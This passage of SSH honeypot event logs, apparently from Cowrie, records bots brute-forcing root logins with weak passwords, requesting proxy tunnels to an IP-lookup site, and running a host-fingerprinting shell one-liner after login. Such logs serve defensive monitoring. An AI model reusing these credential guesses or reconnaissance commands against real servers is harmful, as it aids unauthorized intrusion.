rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T07:59:06.601283Z","src_ip":"212.227.235.229","session":"9069d08e7543"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:59:07.494063Z","src_ip":"212.227.235.229","session":"9069d08e7543"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T07:59:07.752569Z","session":"9069d08e7543"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:59:08.102356Z","src_ip":"212.227.235.229","session":"9069d08e7543"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:08.379532Z","src_ip":"212.227.235.229","session":"9069d08e7543"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48278,"dst_ip":"1.2.3.4","dst_port":22,"session":"48f47a730c9d","protocol":"ssh","message":"New connection: 212.227.235.229:48278 (1.2.3.4:22) [session: 48f47a730c9d]","sensor":"my-vps","timestamp":"2025-08-28T07:59:10.577843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:10.820453Z","src_ip":"212.227.235.229","session":"48f47a730c9d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T07:59:10.877396Z","src_ip":"212.227.235.229","session":"48f47a730c9d"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:59:13.436225Z","src_ip":"212.227.235.229","session":"48f47a730c9d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T07:59:13.723361Z","session":"48f47a730c9d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T07:59:14.007273Z","src_ip":"212.227.235.229","session":"48f47a730c9d"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:14.289326Z","src_ip":"212.227.235.229","session":"48f47a730c9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48306,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c297ac5e564","protocol":"ssh","message":"New connection: 212.227.235.229:48306 (1.2.3.4:22) [session: 0c297ac5e564]","sensor":"my-vps","timestamp":"2025-08-28T07:59:14.415575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:14.420037Z","src_ip":"212.227.235.229","session":"0c297ac5e564"}
{"eventid":"cowrie.session.closed","duration":35.728326082229614,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:14.426184Z","src_ip":"8.222.212.69","session":"a469aec11957"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T07:59:15.703467Z","src_ip":"212.227.235.229","session":"0c297ac5e564"}
{"eventid":"cowrie.login.failed","username":"squid","password":"squid","message":"login attempt [squid/squid] failed","sensor":"my-vps","timestamp":"2025-08-28T07:59:23.254236Z","src_ip":"212.227.235.229","session":"0c297ac5e564"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:24.880692Z","src_ip":"212.227.235.229","session":"0c297ac5e564"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39166,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa2349ccb0a9","protocol":"ssh","message":"New connection: 196.251.86.249:39166 (1.2.3.4:22) [session: fa2349ccb0a9]","sensor":"my-vps","timestamp":"2025-08-28T07:59:35.570824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:59:36.020588Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T07:59:36.022324Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45456,"dst_ip":"1.2.3.4","dst_port":22,"session":"13c4359398b0","protocol":"ssh","message":"New connection: 212.227.235.229:45456 (1.2.3.4:22) [session: 13c4359398b0]","sensor":"my-vps","timestamp":"2025-08-28T07:59:36.492959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:36.493963Z","src_ip":"212.227.235.229","session":"13c4359398b0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T07:59:36.753665Z","src_ip":"212.227.235.229","session":"13c4359398b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45468,"dst_ip":"1.2.3.4","dst_port":22,"session":"d10ad1b13232","protocol":"ssh","message":"New connection: 212.227.235.229:45468 (1.2.3.4:22) [session: d10ad1b13232]","sensor":"my-vps","timestamp":"2025-08-28T07:59:37.781809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:37.784303Z","src_ip":"212.227.235.229","session":"d10ad1b13232"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:59:38.259531Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:59:39.491540Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.492288Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.493195Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.494458Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.495692Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.496544Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.497540Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.498728Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.499429Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.500161Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.500841Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.501696Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.502507Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39516,"dst_ip":"1.2.3.4","dst_port":22,"session":"711815e80838","protocol":"ssh","message":"New connection: 212.227.235.229:39516 (1.2.3.4:22) [session: 711815e80838]","sensor":"my-vps","timestamp":"2025-08-28T07:59:39.987745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T07:59:40.005904Z","src_ip":"212.227.235.229","session":"711815e80838"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T07:59:40.234601Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:40.235734Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:59:40.262063Z","src_ip":"196.251.86.249","session":"fa2349ccb0a9"}
